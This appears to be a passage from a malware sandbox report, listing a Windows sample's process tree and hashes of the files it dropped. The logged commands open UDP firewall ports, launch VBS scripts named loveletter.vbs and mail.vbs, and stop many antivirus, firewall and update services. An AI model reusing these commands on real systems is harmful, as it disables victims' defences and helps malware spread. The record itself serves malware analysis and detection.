C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2564
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2376
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2936
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2668
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3012
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2180
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:1588
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2316
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2272
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2824
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2340
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:960
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2816
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2076
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2992
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2180
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2348
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:1676
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2696
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2216
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2596
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2292
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2284
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2932
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2648
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2700
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:2756
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 22666" dir=in action=allow protocol=UDP localport=88373⤵PID:2732
-
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="UDP Port 18370" dir=out action=allow protocol=UDP localport=97103⤵PID:3060
-
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\loveletter.vbs"2⤵PID:1520
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1280
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\mail.vbs"2⤵
- Suspicious behavior: EnumeratesProcesses
PID:584
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Get-Content -Path C:\Users\Admin\Desktop\YcynNote.txt | Out-Printer"2⤵PID:2328
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s1⤵PID:2044
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec SPBBCSvc" /y2⤵PID:1912
-
-
C:\Windows\system32\scrnsave.scrC:\Windows\system32\scrnsave.scr /s1⤵PID:524
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wuauserv"1⤵PID:956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Security Center" /y1⤵PID:560
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Firewall Monitor Service" /y1⤵PID:1680
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton AntiVirus Auto-Protect Service" /y1⤵PID:296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfee Personal Firewall Service" /y1⤵PID:1980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MonSvcNT /y1⤵PID:2020
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop SAVScan /y1⤵PID:296
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "norton Unerase Protection" /y1⤵PID:1768
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MpfService /y1⤵PID:1712
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "McAfeeAntiSpyware" /y1⤵PID:2004
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop ERSvc /y1⤵PID:1956
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "*norton*" /y1⤵PID:1320
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Nav Auto-Protect" /y1⤵PID:1372
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop InoTask /y1⤵PID:856
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop MskService /y2⤵PID:1092
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "PC-cillin Personal Firewall" /y1⤵PID:1628
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "eTrust Antivirus RPC Server" /y1⤵PID:432
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NProtectService /y2⤵PID:948
-
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Trend Micro Proxy Service" /y1⤵PID:1552
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1491551221-68635567-200658462518575685119498976222434486181921559906-1743484804"1⤵PID:1876
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Ahnlab Task Scheduler" /y1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1092 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "Symantec Core LC" /y2⤵PID:1236
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "1572756939-1271911137-541933866-375995115235301436381688485-157981101216940898"1⤵PID:1052
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2351381781116909015-39162258951560211-1775376661587460192504356957-574013173"1⤵PID:2004
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "826060557778039927907495518456151551892261310-17047371421206132595-1114265027"1⤵
- Suspicious behavior: EnumeratesProcesses
PID:1592
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "856407501-933658017-2012087481-9294783142063660655-1460719356-19556146001381479434"1⤵PID:836
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:1560
-
C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE"C:\Program Files (x86)\Microsoft Office\Office14\OUTLOOK.EXE" -Embedding1⤵PID:2128
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e2d54c25d7035b68dbe2170fe87a2c57
SHA1e5f13cd2dd5325efa65b55e341ff99ab17daac80
SHA25614a04306e70b3c969e2fbad91c9af3b208f9402dd13d6e74862cc12576a754e7
SHA51232c7ad296c73af7d27e9aa1e4bbcdc12611ad464516cbf2a7db93511b6337d78dab8a7554bc992c0bcb99e28216df7902b17c0f0e2f0ef711500be88e59eab3a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e2d54c25d7035b68dbe2170fe87a2c57
SHA1e5f13cd2dd5325efa65b55e341ff99ab17daac80
SHA25614a04306e70b3c969e2fbad91c9af3b208f9402dd13d6e74862cc12576a754e7
SHA51232c7ad296c73af7d27e9aa1e4bbcdc12611ad464516cbf2a7db93511b6337d78dab8a7554bc992c0bcb99e28216df7902b17c0f0e2f0ef711500be88e59eab3a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e2d54c25d7035b68dbe2170fe87a2c57
SHA1e5f13cd2dd5325efa65b55e341ff99ab17daac80
SHA25614a04306e70b3c969e2fbad91c9af3b208f9402dd13d6e74862cc12576a754e7
SHA51232c7ad296c73af7d27e9aa1e4bbcdc12611ad464516cbf2a7db93511b6337d78dab8a7554bc992c0bcb99e28216df7902b17c0f0e2f0ef711500be88e59eab3a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5e2d54c25d7035b68dbe2170fe87a2c57
SHA1e5f13cd2dd5325efa65b55e341ff99ab17daac80
SHA25614a04306e70b3c969e2fbad91c9af3b208f9402dd13d6e74862cc12576a754e7
SHA51232c7ad296c73af7d27e9aa1e4bbcdc12611ad464516cbf2a7db93511b6337d78dab8a7554bc992c0bcb99e28216df7902b17c0f0e2f0ef711500be88e59eab3a
-
Filesize
467B
MD5c31c5e6599e25b06cb3a71fc1b64127d
SHA1fe345f3d32a4389c8c6ba51f5982f9b2012f39ad
SHA256770c377c315338aea2643243f593c5cd28373b9816086c66bf212b4354f35370
SHA512d2f04fcf1714a6ac933a0c342487c36f93bdc5257739bb6406f38678ccabe6237a4b1d67807c7e72e0c20bbbaba6cd4fd2fb9356a8e47043d778d70ce589a51a
-
Filesize
71B
MD53544e4b7ac1418d34061648a9f3e3dc6
SHA130e88f4aa1cc6c936c9c274f9f4f53b491a4d8ce
SHA256db24f2b49b88e4cf7c3569a067f3e6e325d54a3be2368262d37a6a34f4f8aae8
SHA5125d3048b421b4900efdce377d61f8965beb4bc02db27875c03eb378cd9996de9a01b63e54e99b4f94e4cf14e1b60d873d715ccea38fd0bdc1200ad3a2f268e126
-
Filesize
133B
MD5eb5a410c30501ea8862477565ef9b1c6
SHA1a15b4fee44be0c6d91faabeca2cf41dcf1da9541
SHA256102306da5883026784a9f1b61ae5f7b9d09cf896e63394f5d35cac1a21c266df
SHA5127d8478f093e5248c241cd4129b524c44bf813f92af1333c18f01c9fbc2d36919a2f32a15ea0830df44884c7589ba4ef59260277a155fd18eb623ff16d8096322
-
Filesize
138B
MD55a619b37320008ebebf3aa815443e8fa
SHA1e8452a9b27be4a2468a77b9e3179c8b6ad494ab4
SHA2564c5619e74ac51f82cba2696342900ac70e57d709b7dd768507a37f1355171bc0
SHA512c51dab506cfacea43c6c9a21185ad31e874fb13e5ea9caebb6d478fdf5c6138cef09b23ed290026c86a05be62cd2d7ca3e50099a8bd23251239e7940726de5eb
-
Filesize
357B
MD55b11a597cf126340921991823829f0eb
SHA18f26b18b63bc522ee9af4d48e51ad476258be2f5
SHA256e16773e5771aae62b6fb63344a12188af62157c9aba2ad5e6bfa4acdfe795446
SHA512045266d4991b76c92edf754a4ff4d0a19d9960b574fb99c36354b2ac9bc9d8ed7ddf58ea475dff46822a36d0e62ae075fb55db07fc9f090e74f3d1b505daf69a
-
Filesize
495B
MD5900ead69492d80e48738921eca28b14f
SHA16b51607c54f8e734a7ea47091859c3e8dce6365c
SHA256c1a49c4801603e877e673620c289d709c5c2b368dae72e941f9649889faefab3
SHA5128fbb63ea9e5e2bca05bdbcf373056e58aaae2dfd180dfca2fdfdc2b706bb3923798f9878eddf7acef255676eda65f94cc9a827e8abcc9d4da6613f33d74861f2
-
Filesize
488B
MD588ef4bc3f48eeb97aedadff8f3840980
SHA148e8167bef2562d902885a075f6190d269fd3d35
SHA256b62346a7425cfec83d3f05fc4ff268510a16493479f09e7113169aaad5abeefa
SHA512523127a83202c86445825e1d8ab84a268e4f9b40a7c76b91b4947fb29de1c0819ba3e856bc1cbd40d6b0d10c04ca356a5e0dc975708a3d765ab425ab1a7d1024
-
Filesize
56KB
MD5bd72dcf1083b6e22ccbfa0e8e27fb1e0
SHA13fd23d4f14da768da7b8364d74c54932d704e74e
SHA25690f44f69950a796ab46ff09181585ac9dabf21271f16ebb9ea385c957e5955c1
SHA51272360ab4078ad5e0152324f9a856b3396e2d0247f7f95ac8a5a53a25126ac3cff567cc523849e28d92a99730ee8ffb30366f09c428258f93a5cca6d0c5905562
-
Filesize
640B
MD537a42188327ced5450bd8ef9b5a16bbe
SHA11f332e4ea66e55337808fb794b58ea4e182e1f19
SHA2564fb7375c44fab40f69801d65177027c52cdbb79fdcfb3a91d75c469f7fe0533d
SHA5123d0751688dc9026da234f1c61330782fbc20655ff8a810c2bf529db958e1d3fd3b9bce7d9e027edbe92c819b9074474e5e84775828a11721e9aeb05d85a0f363
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e